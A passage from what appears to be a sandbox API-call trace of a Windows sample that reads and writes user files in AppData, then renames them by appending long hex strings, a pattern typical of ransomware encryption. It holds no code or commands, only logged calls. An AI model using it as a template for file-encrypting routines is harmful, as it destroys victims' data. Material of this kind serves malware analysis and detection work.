returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\9YpZDvMy.mp3.6849EE099374947775D67B29CAA6E2F4AF0C097D5DD092D557987DAC03250A6C" [0121.997] GetProcessHeap () returned 0x600000 [0121.997] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x128) returned 0x6b4210 [0121.997] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x26fff60, FileInformation=0x6b4210, Length=0x128, FileInformationClass=0xa) returned 0x0 [0121.998] CloseHandle (hObject=0x338) returned 1 [0121.999] GetProcessHeap () returned 0x600000 [0121.999] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0122.001] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0122.001] WriteFile (in: hFile=0x31c, lpBuffer=0x30e82d8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0) returned 1 [0122.002] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0122.614] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x30c8250, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x30c8250, ReturnLength=0x26fff70) returned 0x0 [0122.614] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\4wgUwOseTEhyM.avi", lpString2=".44B0D3E721FAC06244E50978C9D85D64E2E5D47AF6241E5679E799DAA0D66B64" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\4wgUwOseTEhyM.avi.44B0D3E721FAC06244E50978C9D85D64E2E5D47AF6241E5679E799DAA0D66B64") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\4wgUwOseTEhyM.avi.44B0D3E721FAC06244E50978C9D85D64E2E5D47AF6241E5679E799DAA0D66B64" [0122.614] GetProcessHeap () returned 0x600000 [0122.614] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x12c) returned 0x6da800 [0122.614] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x26fff60, FileInformation=0x6da800, Length=0x12c, FileInformationClass=0xa) returned 0x0 [0122.616] CloseHandle (hObject=0x32c) returned 1 [0122.617] GetProcessHeap () returned 0x600000 [0122.617] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0122.618] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0122.619] WriteFile (in: hFile=0x320, lpBuffer=0x32e9198*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32c9060 | out: lpBuffer=0x32e9198*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32c9060) returned 1 [0122.620] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0122.813] WriteFile (in: hFile=0x320, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0122.814] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0122.847] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x26fff70) returned 0x0 [0122.848] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Cs93xcG-R.ods", lpString2=".3695816B37A3E6694EA9904E07E0B04BF84E867FBCD8D1F544BFE230716F3249" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Cs93xcG-R.ods.3695816B37A3E6694EA9904E07E0B04BF84E867FBCD8D1F544BFE230716F3249") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Cs93xcG-R.ods.3695816B37A3E6694EA9904E07E0B04BF84E867FBCD8D1F544BFE230716F3249" [0122.848] GetProcessHeap () returned 0x600000 [0122.848] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x124) returned 0x6daa70 [0122.848] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x26fff60, FileInformation=0x6daa70, Length=0x124, FileInformationClass=0xa) returned 0x0 [0122.850] CloseHandle (hObject=0x308) returned 1 [0122.851] GetProcessHeap () returned 0x600000 [0122.851] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0122.853] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0122.855] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x26fff70) returned 0x0 [0122.856] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\DkNzyLs-PuR.csv", lpString2=".1EDCFFCF5CB7052460756120FF6A1006D81242363370130E722A818F41BA8A7A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\DkNzyLs-PuR.csv.1EDCFFCF5CB7052460756120FF6A1006D81242363370130E722A818F41BA8A7A") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\DkNzyLs-PuR.csv.1EDCFFCF5CB7052460756120FF6A1006D81242363370130E722A818F41BA8A7A" [0122.856] GetProcessHeap () returned 0x600000 [0122.856] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x128) returned 0x6daba0 [0122.856] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x26fff60, FileInformation=0x6daba0, Length=0x128, FileInformationClass=0xa) returned 0x0 [0122.858] CloseHandle (hObject=0x32c) returned 1 [0122.858] GetProcessHeap () returned 0x600000 [0122.858] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0122.860] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0122.868] ReadFile (in: hFile=0x32c, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x2400, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0122.868] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0122.869] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x26fff70) returned 0x0 [0122.870] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Jede3apq.m4a", lpString2=".2A739507ADED45802E0A5C0826314E5AA0E38CBA4C9C38220D98E08331856872" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Jede3apq.m4a.2A739507ADED45802E0A5C0826314E5AA0E38CBA4C9C38220D98E08331856872") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Jede3apq.m4a.2A739507ADED45802E0A5C0826314E5AA0E38CBA4C9C38220D98E08331856872" [0122.870] GetProcessHeap () returned 0x600000 [0122.870] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x122) returned 0x6dacd0 [0122.870] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x26fff60, FileInformation=0x6dacd0, Length=0x122, FileInformationClass=0xa) returned 0x0 [0122.872] CloseHandle (hObject=0x32c) returned 1 [0122.872] GetProcessHeap () returned 0x600000 [0122.873] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0122.873] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0122.879] ReadFile (in: hFile=0x32c, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0122.879] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0122.880] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x26fff70) returned 0x0 [0122.881] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ks2RWZ.mp3", lpString2=".12FF402193551D8AB3FE20639358C8D1CAA508401735EA71C6FAEE3781980A44" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ks2RWZ.mp3.12FF402193551D8AB3FE20639358C8D1CAA508401735EA71C6FAEE3781980A44") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ks2RWZ.mp3.12FF402193551D8AB3FE20639358C8D1CAA508401735EA71C6FAEE3781980A44" [0122.881] GetProcessHeap () returned 0x600000 [0122.881] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x11e) returned 0x6f18c8 [0122.881] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x26fff60, FileInformation=0x6f18c8, Length=0x11e, FileInformationClass=0xa) returned 0x0 [0122.883] CloseHandle (hObject=0x32c) returned 1 [0122.883] GetProcessHeap () returned 0x600000 [0122.883] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0122.883] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0122.887] ReadFile (in: hFile=0x32c, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0122.888] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0122.889] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x26fff70) returned 0x0 [0122.890] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\l4N-yLZqAqIjN0Qs7v.mp3", lpString2=".07654D8EE8E7804A74C1A67107029403627FE5DC622B3F0F87BAD26DB03DB81C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\l4N-yLZqAqIjN0Qs7v.mp3.07654D8EE8E7804A74C1A67107029403627FE5DC622B3F0F87BAD26DB03DB81C") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\l4N-yLZqAqIjN0Qs7v.mp3.07654D8EE8E7804A74C1A67107029403627FE5DC622B3F0F87BAD26DB03DB81C" [0122.890] GetProcessHeap () returned 0x600000 [0122.890] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x136) returned 0x3152b38 [0122.890] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x26fff60, FileInformation=0x3152b38, Length=0x136, FileInformationClass=0xa) returned 0x0 [0122.892] CloseHandle (hObject=0x32c) returned 1 [0122.892] GetProcessHeap () returned 0x600000 [0122.893] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0122.893] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0122.897] ReadFile (in: hFile=0x32c, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x3000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0122.897] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0122.899] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x26fff70) returned 0x0 [0122.899] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\lPqr_VhdR75b7n5r.gif", lpString2=".BBD45C4A9BB58349AD8D242859C0C2FE3D63CE1865FF2D78EC912D50AA923C4B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\lPqr_VhdR75b7n5r.gif.BBD45C4A9BB58349AD8D242859C0C2FE3D63CE1865FF2D78EC912D50AA923C4B") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\lPqr_VhdR75b7n5r.gif.BBD45C4A9BB58349AD8D242859C0C2FE3D63CE1865FF2D78EC912D50AA923C4B" [0122.899] GetProcessHeap () returned 0x600000 [0122.899] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x132) returned 0x31529f0 [0122.899] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x26fff60, FileInformation=0x31529f0, Length=0x132, FileInformationClass=0xa) returned 0x0 [0122.902] CloseHandle (hObject=0x32c) returned 1 [0122.902] GetProcessHeap () returned 0x600000 [0122.902] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0122.902] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0122.906] ReadFile (in: hFile=0x32c, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0122.906] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0122.908] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x26fff70) returned 0x0 [0122.909] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Lqpw8UFBam.wav", lpString2=".AEB621FEDE9C5601E55F22BD4BA1282521EB16FE50D044AD67A9B6269112961E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Lqpw8UFBam.wav.AEB621FEDE9C5601E55F22BD4BA1282521EB16FE50D044AD67A9B6269112961E") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Lqpw8UFBam.wav.AEB621FEDE9C5601E55F22BD4BA1282521EB16FE50D044AD67A9B6269112961E" [0122.909] GetProcessHeap () returned 0x600000 [0122.909] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x126) returned 0x6dae00 [0122.909] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x26fff60, FileInformation=0x6dae00, Length=0x126, FileInformationClass=0xa) returned 0x0 [0122.911] CloseHandle (hObject=0x32c) returned 1 [0122.911] GetProcessHeap () returned 0x600000 [0122.911] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0122.911] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0122.922] WriteFile (in: hFile=0x324, lpBuffer=0x30e82d8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0) returned 1 [0122.923] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0123.399] ReadFile (in: hFile=0x308, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0123.399] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0123.412] WriteFile (in: hFile=0x308, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0123.413] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0123.420] WriteFile (in: hFile=0x308, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0123.421] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0123.429] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x26fff70) returned 0x0 [0123.430] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\O8Ti.jpg", lpString2=".95A3D65E41094B293EA6F5700E7002889AD5F7DBCAD607CDB2E4FBDA65BBE345" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\O8Ti.jpg.95A3D65E41094B293EA6F5700E7002889AD5F7DBCAD607CDB2E4FBDA65BBE345") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\O8Ti.jpg.95A3D65E41094B293EA6F5700E7002889AD5F7DBCAD607CDB2E4FBDA65BBE345" [0123.430] GetProcessHeap () returned 0x600000 [0123.430] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x11a) returned 0x3117700 [0123.430] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x26fff60, FileInformation=0x3117700, Length=0x11a, FileInformationClass=0xa) returned 0x0 [0123.432] CloseHandle (hObject=0x308) returned 1 [0123.433] GetProcessHeap () returned 0x600000 [0123.433] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0123.433] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0123.436] ReadFile (in: hFile=0x308, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0123.436] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0123.437] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x26fff70) returned 0x0 [0123.437] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\oflD41b-F_FUwjogy5B.bmp", lpString2=".A7D0E9A6C03855BA88A57DD1C4FEB683FEDFBB435B5E4E7D90A44BA7DB925242" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\oflD41b-F_FUwjogy5B.bmp.A7D0E9A6C03855BA88A57DD1C4FEB683FEDFBB435B5E4E7D90A44BA7DB925242") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\oflD41b-F_FUwjogy5B.bmp.A7D0E9A6C03855BA88A57DD1C4FEB683FEDFBB435B5E4E7D90A44BA7DB925242" [0123.437] GetProcessHeap () returned 0x600000 [0123.437] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x138) returned 0x3151a90 [0123.437] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x26fff60, FileInformation=0x3151a90, Length=0x138, FileInformationClass=0xa) returned 0x0 [0123.439] CloseHandle (hObject=0x308) returned 1 [0123.439] GetProcessHeap () returned 0x600000 [0123.439] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0123.439] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0123.442] ReadFile (in: hFile=0x308, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0123.442] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0123.444] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x26fff70) returned 0x0 [0123.444] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\p4zini7.gif", lpString2=".C37500C2A3AD4CB46CE9954CE98BBACD8476780DC174BCDA933CDB775D478D63" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\p4zini7.gif.C37500C2A3AD4CB46CE9954CE98BBACD8476780DC174BCDA933CDB775D478D63") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\p4zini7.gif.C37500C2A3AD4CB46CE9954CE98BBACD8476780DC174BCDA933CDB775D478D63" [0123.444] GetProcessHeap () returned 0x600000 [0123.444] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x120) returned 0x3117828 [0123.444] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x26fff60, FileInformation=0x3117828, Length=0x120, FileInformationClass=0xa) returned 0x0 [0123.445] CloseHandle (hObject=0x308) returned 1 [0123.446] GetProcessHeap () returned 0x600000 [0123.446] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0123.447] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0123.452] ReadFile (in: hFile=0x308, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 